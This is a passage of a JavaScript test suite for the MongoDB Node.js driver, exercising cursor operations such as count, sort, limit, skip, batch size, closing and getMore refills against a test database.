function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_explain', function(err, collection) { test.equal(null, err); collection.insert({ a: 1 }, configuration.writeConcernMax(), function(err) { test.equal(null, err); collection.find({ a: 1 }).explain(function(err, explaination) { test.equal(null, err); test.ok(explaination != null); // Let's close the db client.close(); done(); }); }); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyExecuteCursorCount', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_count', function(err, collection) { test.equal(null, err); collection.find().count(function(err) { test.equal(null, err); function insert(callback) { var total = 10; for (var i = 0; i < 10; i++) { collection.insert({ x: i }, configuration.writeConcernMax(), function(e) { test.equal(null, e); total = total - 1; if (total === 0) callback(); }); } } function finished() { collection.find().count(function(err, count) { test.equal(null, err); test.equal(10, count); test.ok(count.constructor === Number); collection.find({}, { limit: 5 }).count(function(err, count) { test.equal(null, err); test.equal(5, count); collection.find({}, { skip: 5 }).count(function(err, count) { test.equal(null, err); test.equal(5, count); 
db.collection('acollectionthatdoesn').count(function(err, count) { test.equal(null, err); test.equal(0, count); var cursor = collection.find(); cursor.count(function(err, count) { test.equal(null, err); test.equal(10, count); cursor.each(function(err, item) { test.equal(null, err); if (item == null) { cursor.count(function(err, count2) { test.equal(null, err); test.equal(10, count2); test.equal(count, count2); // Let's close the db client.close(); done(); }); } }); }); }); }); }); }); } insert(function() { finished(); }); }); }); }); } }); it('Should correctly execute cursor count with secondary readPreference', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: 'replicaset' } }, // The actual test we wish to run test: function(done) { const configuration = this.configuration; const client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect((err, client) => { const db = client.db(configuration.db); let internalClientCursor; if (configuration.usingUnifiedTopology()) { internalClientCursor = sinon.spy(client.topology, 'cursor'); } else { internalClientCursor = sinon.spy(client.topology.s.coreTopology, 'cursor'); } const expectedReadPreference = new ReadPreference(ReadPreference.SECONDARY); const cursor = db.collection('countTEST').find({ qty: { $gt: 4 } }); cursor.count(true, { readPreference: ReadPreference.SECONDARY }, err => { expect(err).to.be.null; expect(internalClientCursor.getCall(0).args[2]) .to.have.nested.property('readPreference') .that.deep.equals(expectedReadPreference); client.close(); done(); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyExecuteCursorCountWithDottedCollectionName', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 
'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_count.ext', function(err, collection) { test.equal(null, err); collection.find().count(function(err) { test.equal(null, err); function insert(callback) { var total = 10; for (var i = 0; i < 10; i++) { collection.insert({ x: i }, configuration.writeConcernMax(), function(e) { test.equal(null, e); total = total - 1; if (total === 0) callback(); }); } } function finished() { collection.find().count(function(err, count) { test.equal(null, err); test.equal(10, count); test.ok(count.constructor === Number); collection.find({}, { limit: 5 }).count(function(err, count) { test.equal(null, err); test.equal(5, count); collection.find({}, { skip: 5 }).count(function(err, count) { test.equal(null, err); test.equal(5, count); db.collection('acollectionthatdoesn').count(function(err, count) { test.equal(null, err); test.equal(0, count); var cursor = collection.find(); cursor.count(function(err, count) { test.equal(null, err); test.equal(10, count); cursor.each(function(err, item) { test.equal(null, err); if (item == null) { cursor.count(function(err, count2) { test.equal(null, err); test.equal(10, count2); test.equal(count, count2); // Let's close the db client.close(); done(); }); } }); }); }); }); }); }); } insert(function() { finished(); }); }); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyExecuteSortOnCursor', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; 
var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_sort', function(err, collection) { test.equal(null, err); function insert(callback) { var total = 10; for (var i = 0; i < 10; i++) { collection.insert({ x: i }, configuration.writeConcernMax(), function(e) { test.equal(null, e); total = total - 1; if (total === 0) callback(); }); } } function f() { var number_of_functions = 9; var finished = function() { number_of_functions = number_of_functions - 1; if (number_of_functions === 0) { client.close(); done(); } }; var cursor = collection.find().sort(['a', 1]); test.deepEqual(['a', 1], cursor.sortValue); finished(); cursor = collection.find().sort('a', 1); test.deepEqual([['a', 1]], cursor.sortValue); finished(); cursor = collection.find().sort('a', -1); test.deepEqual([['a', -1]], cursor.sortValue); finished(); cursor = collection.find().sort('a', 'asc'); test.deepEqual([['a', 'asc']], cursor.sortValue); finished(); cursor = collection.find().sort([['a', -1], ['b', 1]]); var entries = cursor.sortValue.entries(); test.deepEqual(['a', -1], entries.next().value); test.deepEqual(['b', 1], entries.next().value); finished(); cursor = collection .find() .sort('a', 1) .sort('a', -1); test.deepEqual([['a', -1]], cursor.sortValue); finished(); cursor.next(function(err) { test.equal(null, err); try { cursor.sort(['a']); } catch (err) { test.equal('Cursor is closed', err.message); finished(); } }); collection .find() .sort('a', 25) .next(function(err) { test.equal( "Illegal sort clause, must be of the form [['field1', '(ascending|descending)'], ['field2', '(ascending|descending)']]", err.message ); finished(); }); collection .find() .sort(25) .next(function(err) { test.equal( "Illegal sort clause, must be of the form [['field1', '(ascending|descending)'], ['field2', '(ascending|descending)']]", err.message ); 
finished(); }); } insert(function() { f(); }); }); }); } }); /** * @ignore * @api private */ it('shouldThrowErrorOnEachWhenMissingCallback', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_each', function(err, collection) { test.equal(null, err); function insert(callback) { var total = 10; for (var i = 0; i < 10; i++) { collection.insert({ x: i }, configuration.writeConcernMax(), function(e) { test.equal(null, e); total = total - 1; if (total === 0) callback(); }); } } function finished() { collection.find(function(err, cursor) { test.equal(null, err); test.throws(function() { cursor.each(); }); client.close(); done(); }); } insert(function() { finished(); }); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyHandleLimitOnCursor', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); db.createCollection('test_cursor_limit', function(err, collection) { function insert(callback) { var total = 10; for (var i = 0; i < 10; i++) { collection.insert({ x: i }, configuration.writeConcernMax(), function(e) { test.equal(null, e); total = total - 1; 
if (total === 0) callback(); }); } } function finished() { collection .find() .limit(5) .toArray(function(err, items) { test.equal(5, items.length); // Let's close the db test.equal(null, err); client.close(); done(); }); } insert(function() { finished(); }); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyHandleNegativeOneLimitOnCursor', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_cursor_negative_one_limit', function(err, collection) { test.equal(null, err); function insert(callback) { var total = 10; for (var i = 0; i < 10; i++) { collection.insert({ x: i }, configuration.writeConcernMax(), function(e) { test.equal(null, e); total = total - 1; if (total === 0) callback(); }); } } function finished() { collection .find() .limit(-1) .toArray(function(err, items) { test.equal(null, err); test.equal(1, items.length); // Let's close the db client.close(); done(); }); } insert(function() { finished(); }); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyHandleAnyNegativeLimitOnCursor', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, 
err); var db = client.db(configuration.db); db.createCollection('test_cursor_any_negative_limit', function(err, collection) { test.equal(null, err); function insert(callback) { var total = 10; for (var i = 0; i < 10; i++) { collection.insert({ x: i }, configuration.writeConcernMax(), function(e) { test.equal(null, e); total = total - 1; if (total === 0) callback(); }); } } function finished() { collection .find() .limit(-5) .toArray(function(err, items) { test.equal(null, err); test.equal(5, items.length); // Let's close the db client.close(); done(); }); } insert(function() { finished(); }); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyReturnErrorsOnIllegalLimitValues', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_limit_exceptions', function(err, collection) { test.equal(null, err); collection.insert({ a: 1 }, configuration.writeConcernMax(), function(err) { test.equal(null, err); }); collection.find(function(err, cursor) { test.equal(null, err); try { cursor.limit('not-an-integer'); } catch (err) { test.equal('limit requires an integer', err.message); } try { cursor.limit('not-an-integer'); test.ok(false); } catch (err) { test.equal('limit requires an integer', err.message); } }); collection.find(function(err, cursor) { test.equal(null, err); cursor.close(function(err, cursor) { test.equal(null, err); try { cursor.limit(1); } catch (err) { test.equal('Cursor is closed', err.message); } collection.find(function(err, cursor) { test.equal(null, err); 
cursor.next(function(err) { test.equal(null, err); try { cursor.limit(1); } catch (err) { test.equal('Cursor is closed', err.message); } try { cursor.limit(1); test.ok(false); } catch (err) { test.equal('Cursor is closed', err.message); } client.close(); done(); }); }); try { cursor.limit(1); test.ok(false); } catch (err) { test.equal('Cursor is closed', err.message); } }); }); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlySkipRecordsOnCursor', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_skip', function(err, collection) { test.equal(null, err); function insert(callback) { var total = 10; for (var i = 0; i < 10; i++) { collection.insert({ x: i }, configuration.writeConcernMax(), function(e) { test.equal(null, e); total = total - 1; if (total === 0) callback(); }); } } function finished() { collection.find(function(err, cursor) { test.equal(null, err); cursor.count(function(err, count) { test.equal(null, err); test.equal(10, count); }); }); collection.find(function(err, cursor) { test.equal(null, err); cursor.toArray(function(err, items) { test.equal(null, err); test.equal(10, items.length); collection .find() .skip(2) .toArray(function(err, items2) { test.equal(null, err); test.equal(8, items2.length); // Check that we have the same elements var numberEqual = 0; var sliced = items.slice(2, 10); for (var i = 0; i < sliced.length; i++) { if (sliced[i].x === items2[i].x) numberEqual = numberEqual + 1; } test.equal(8, numberEqual); // Let's close the db 
client.close(); done(); }); }); }); } insert(function() { finished(); }); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyReturnErrorsOnIllegalSkipValues', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_skip_exceptions', function(err, collection) { test.equal(null, err); collection.insert({ a: 1 }, configuration.writeConcernMax(), function(err) { test.equal(null, err); }); try { collection.find().skip('not-an-integer'); } catch (err) { test.equal('skip requires an integer', err.message); } var cursor = collection.find(); cursor.next(function(err) { test.equal(null, err); try { cursor.skip(1); } catch (err) { test.equal('Cursor is closed', err.message); } var cursor2 = collection.find(); cursor2.close(function(err) { test.equal(null, err); try { cursor2.skip(1); } catch (err) { test.equal('Cursor is closed', err.message); } client.close(); done(); }); }); }); }); } }); /** * @ignore * @api private */ it('shouldReturnErrorsOnIllegalBatchSizes', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); 
db.createCollection('test_batchSize_exceptions', function(err, collection) { test.equal(null, err); collection.insert({ a: 1 }, configuration.writeConcernMax(), function(err) { test.equal(null, err); }); var cursor = collection.find(); try { cursor.batchSize('not-an-integer'); test.ok(false); } catch (err) { test.equal('batchSize requires an integer', err.message); } cursor = collection.find(); cursor.next(function(err) { test.equal(null, err); cursor.next(function(err) { test.equal(null, err); try { cursor.batchSize(1); test.ok(false); } catch (err) { test.equal('Cursor is closed', err.message); } var cursor2 = collection.find(); cursor2.close(function(err) { test.equal(null, err); try { cursor2.batchSize(1); test.ok(false); } catch (err) { test.equal('Cursor is closed', err.message); } client.close(); done(); }); }); }); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyHandleChangesInBatchSizes', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_not_multiple_batch_size', function(err, collection) { test.equal(null, err); var records = 6; var batchSize = 2; var docs = []; for (var i = 0; i < records; i++) { docs.push({ a: i }); } collection.insert(docs, configuration.writeConcernMax(), function() { test.equal(null, err); collection.find({}, { batchSize: batchSize }, function(err, cursor) { test.equal(null, err); //1st cursor.next(function(err, items) { test.equal(null, err); //cursor.items should contain 1 since nextObject already popped one test.equal(1, 
cursor.bufferedCount()); test.ok(items != null); //2nd cursor.next(function(err, items) { test.equal(null, err); test.equal(0, cursor.bufferedCount()); test.ok(items != null); //test batch size modification on the fly batchSize = 3; cursor.batchSize(batchSize); //3rd cursor.next(function(err, items) { test.equal(null, err); test.equal(2, cursor.bufferedCount()); test.ok(items != null); //4th cursor.next(function(err, items) { test.equal(null, err); test.equal(1, cursor.bufferedCount()); test.ok(items != null); //5th cursor.next(function(err, items) { test.equal(null, err); test.equal(0, cursor.bufferedCount()); test.ok(items != null); //6th cursor.next(function(err, items) { test.equal(null, err); test.equal(0, cursor.bufferedCount()); test.ok(items != null); //No more cursor.next(function(err, items) { test.equal(null, err); test.ok(items == null); test.ok(cursor.isClosed()); client.close(); done(); }); }); }); }); }); }); }); }); }); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyHandleBatchSize', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_multiple_batch_size', function(err, collection) { test.equal(null, err); //test with the last batch that is a multiple of batchSize var records = 4; var batchSize = 2; var docs = []; for (var i = 0; i < records; i++) { docs.push({ a: i }); } collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); collection.find({}, { batchSize: batchSize }, function(err, cursor) { test.equal(null, 
err); //1st cursor.next(function(err, items) { test.equal(null, err); test.equal(1, cursor.bufferedCount()); test.ok(items != null); //2nd cursor.next(function(err, items) { test.equal(null, err); test.equal(0, cursor.bufferedCount()); test.ok(items != null); //3rd cursor.next(function(err, items) { test.equal(null, err); test.equal(1, cursor.bufferedCount()); test.ok(items != null); //4th cursor.next(function(err, items) { test.equal(null, err); test.equal(0, cursor.bufferedCount()); test.ok(items != null); //No more cursor.next(function(err, items) { test.equal(null, err); test.ok(items == null); test.ok(cursor.isClosed()); client.close(); done(); }); }); }); }); }); }); }); }); }); } }); /** * @ignore * @api private */ it('shouldHandleWhenLimitBiggerThanBatchSize', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_limit_greater_than_batch_size', function(err, collection) { test.equal(null, err); var limit = 4; var records = 10; var batchSize = 3; var docs = []; for (var i = 0; i < records; i++) { docs.push({ a: i }); } collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); var cursor = collection.find({}, { batchSize: batchSize, limit: limit }); //1st cursor.next(function(err) { test.equal(null, err); test.equal(2, cursor.bufferedCount()); //2nd cursor.next(function(err) { test.equal(null, err); test.equal(1, cursor.bufferedCount()); //3rd cursor.next(function(err) { test.equal(null, err); test.equal(0, cursor.bufferedCount()); //4th 
cursor.next(function(err) { test.equal(null, err); //No more cursor.next(function(err, items) { test.equal(null, err); test.ok(items == null); test.ok(cursor.isClosed()); client.close(); done(); }); }); }); }); }); }); }); }); } }); /** * @ignore * @api private */ it('shouldHandleLimitLessThanBatchSize', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_limit_less_than_batch_size', function(err, collection) { test.equal(null, err); var limit = 2; var records = 10; var batchSize = 4; var docs = []; for (var i = 0; i < records; i++) { docs.push({ a: i }); } collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); var cursor = collection.find({}, { batchSize: batchSize, limit: limit }); //1st cursor.next(function(err) { test.equal(null, err); test.equal(1, cursor.bufferedCount()); //2nd cursor.next(function(err) { test.equal(null, err); test.equal(0, cursor.bufferedCount()); //No more cursor.next(function(err, items) { test.equal(null, err); test.ok(items == null); test.ok(cursor.isClosed()); client.close(); done(); }); }); }); }); }); }); } }); /** * @ignore * @api private */ it('shouldHandleSkipLimitChaining', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = 
configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); var collection = db.collection('shouldHandleSkipLimitChaining'); function insert(callback) { var total = 10; for (var i = 0; i < 10; i++) { collection.insert({ x: i }, configuration.writeConcernMax(), function(e) { test.equal(null, e); total = total - 1; if (total === 0) callback(); }); } } function finished() { collection.find().toArray(function(err, items) { test.equal(null, err); test.equal(10, items.length); collection .find() .limit(5) .skip(3) .toArray(function(err, items2) { test.equal(null, err); test.equal(5, items2.length); // Check that we have the same elements var numberEqual = 0; var sliced = items.slice(3, 8); for (var i = 0; i < sliced.length; i++) { if (sliced[i].x === items2[i].x) numberEqual = numberEqual + 1; } test.equal(5, numberEqual); // Let's close the db client.close(); done(); }); }); } insert(function() { finished(); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyHandleLimitSkipChainingInline', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_limit_skip_chaining_inline', function(err, collection) { test.equal(null, err); function insert(callback) { var total = 10; for (var i = 0; i < 10; i++) { collection.insert({ x: i }, configuration.writeConcernMax(), function(e) { test.equal(null, e); total = total - 1; if (total === 0) callback(); }); } } function finished() { 
collection.find().toArray(function(err, items) { test.equal(null, err); test.equal(10, items.length); collection .find() .limit(5) .skip(3) .toArray(function(err, items2) { test.equal(null, err); test.equal(5, items2.length); // Check that we have the same elements var numberEqual = 0; var sliced = items.slice(3, 8); for (var i = 0; i < sliced.length; i++) { if (sliced[i].x === items2[i].x) numberEqual = numberEqual + 1; } test.equal(5, numberEqual); // Let's close the db client.close(); done(); }); }); } insert(function() { finished(); }); }); }); } }); /** * @ignore * @api private */ it('shouldCloseCursorNoQuerySent', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_close_no_query_sent', function(err, collection) { test.equal(null, err); collection.find().close(function(err, cursor) { test.equal(null, err); test.equal(true, cursor.isClosed()); // Let's close the db client.close(); done(); }); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyRefillViaGetMoreCommand', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var COUNT = 1000; var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = 
client.db(configuration.db); db.createCollection('test_refill_via_get_more', function(err, collection) { test.equal(null, err); function insert(callback) { var docs = []; for (var i = 0; i < COUNT; i++) { docs.push({ a: i }); } collection.insertMany(docs, configuration.writeConcernMax(), callback); } function finished() { collection.count(function(err, count) { test.equal(null, err); test.equal(COUNT, count); }); var total = 0; collection.find({}, {}).each(function(err, item) { test.equal(null, err); if (item != null) { total = total + item.a; } else { test.equal(499500, total); collection.count(function(err, count) { test.equal(null, err); test.equal(COUNT, count); }); collection.count(function(err, count) { test.equal(null, err); test.equal(COUNT, count); var total2 = 0; collection.find().each(function(err, item) { test.equal(null, err); if (item != null) { total2 = total2 + item.a; } else { test.equal(499500, total2); collection.count(function(err, count) { test.equal(null, err); test.equal(COUNT, count); test.equal(total, total2); // Let's close the db client.close(); done(); }); } }); }); } }); } insert(function() { finished(); }); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyRefillViaGetMoreAlternativeCollection', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_refill_via_get_more_alt_coll', function(err, collection) { test.equal(null, err); var COUNT = 1000; function insert(callback) { var docs = []; for (var i = 0; i < COUNT; i++) { docs.push({ a: i }); } 
collection.insertMany(docs, configuration.writeConcernMax(), callback); } function finished() { collection.count(function(err, count) { test.equal(null, err); test.equal(1000, count); }); var total = 0; collection.find().each(function(err, item) { test.equal(null, err); if (item != null) { total = total + item.a; } else { test.equal(499500, total); collection.count(function(err, count) { test.equal(null, err); test.equal(1000, count); }); collection.count(function(err, count) { test.equal(null, err); test.equal(1000, count); var total2 = 0; collection.find().each(function(err, item) { test.equal(null, err); if (item != null) { total2 = total2 + item.a; } else { test.equal(499500, total2); collection.count(function(err, count) { test.equal(null, err); test.equal(1000, count); test.equal(total, total2); // Let's close the db client.close(); done(); }); } }); }); } }); } insert(function() { finished(); }); }); }); } }); /** * @ignore * @api private */ it('shouldCloseCursorAfterQueryHasBeenSent', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_close_after_query_sent', function(err, collection) { test.equal(null, err); collection.insert({ a: 1 }, configuration.writeConcernMax(), function(err) { test.equal(null, err); var cursor = collection.find({ a: 1 }); cursor.next(function(err) { test.equal(null, err); cursor.close(function(err, cursor) { test.equal(null, err); test.equal(true, cursor.isClosed()); // Let's close the db client.close(); done(); }); }); }); }); }); } }); /** * @ignore * 
@api private */ it('shouldCorrectlyExecuteCursorCountWithFields', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_count_with_fields', function(err, collection) { test.equal(null, err); collection.save({ x: 1, a: 2 }, configuration.writeConcernMax(), function(err) { test.equal(null, err); collection .find({}) .project({ a: 1 }) .toArray(function(err, items) { test.equal(null, err); test.equal(1, items.length); test.equal(2, items[0].a); test.equal(undefined, items[0].x); client.close(); done(); }); }); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyCountWithFieldsUsingExclude', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_count_with_fields_using_exclude', function(err, collection) { test.equal(null, err); collection.save({ x: 1, a: 2 }, configuration.writeConcernMax(), function(err) { test.equal(null, err); collection.find({}, { fields: { x: 0 } }).toArray(function(err, items) { test.equal(null, err); test.equal(1, items.length); test.equal(2, items[0].a); test.equal(undefined, 
items[0].x); client.close(); done(); }); }); }); }); } }); /** * @ignore * @api private */ it('Should correctly execute count on cursor', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var docs = []; for (var i = 0; i < 1000; i++) { var d = new Date().getTime() + i * 1000; docs[i] = { a: i, createdAt: new Date(d) }; } var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('Should_correctly_execute_count_on_cursor_1', function( err, collection ) { test.equal(null, err); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); var total = 0; // Create a cursor for the content var cursor = collection.find({}); cursor.count(function(err) { test.equal(null, err); // Ensure each returns all documents cursor.each(function(err, item) { test.equal(null, err); if (item != null) { total++; } else { cursor.count(function(err, c) { test.equal(null, err); test.equal(1000, c); test.equal(1000, total); client.close(); done(); }); } }); }); }); }); }); } }); /** * @ignore * @api private */ it('should be able to stream documents', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var docs = []; for (var i = 0; i < 1000; i++) { docs[i] = { a: i + 1 }; } var count = 0; var configuration = this.configuration; var client = 
